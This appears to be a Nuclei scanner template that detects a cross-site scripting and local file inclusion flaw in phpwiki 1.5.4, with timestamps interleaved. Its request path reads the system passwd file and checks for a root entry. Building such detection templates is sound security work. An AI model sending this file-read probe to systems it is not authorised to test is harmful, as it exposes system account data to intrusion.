2021-09-07 09:54:45 +00:00
id : phpwiki-lfi
info :
2022-08-05 13:57:51 +00:00
name : phpwiki 1.5.4 - Cross-Site Scripting/Local File Inclusion
2021-09-07 09:54:45 +00:00
author : 0x_Akoko
severity : high
2022-08-05 13:57:51 +00:00
description : phpwiki 1.5.4 is vulnerable to cross-site scripting and local file inclusion, and allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/38027
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-10-14 11:27:55 +00:00
tags : xss,edb,phpwiki,lfi
2021-09-07 09:54:45 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-07 09:54:45 +00:00
- method : GET
path :
- "{{BaseURL}}/phpwiki/index.php/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
2023-10-19 13:13:52 +00:00
# digest: 4b0a00483046022100ea31d8e788d8aec70e923edb45d274e581fa57bf7f624ee1e861eafa5f96067e022100809b53d62e4f544193fdeeea66550d17f8e459fe34fcc2aec3e5d9cad0afc8da:922c64590222798bb761d5b6d8e72950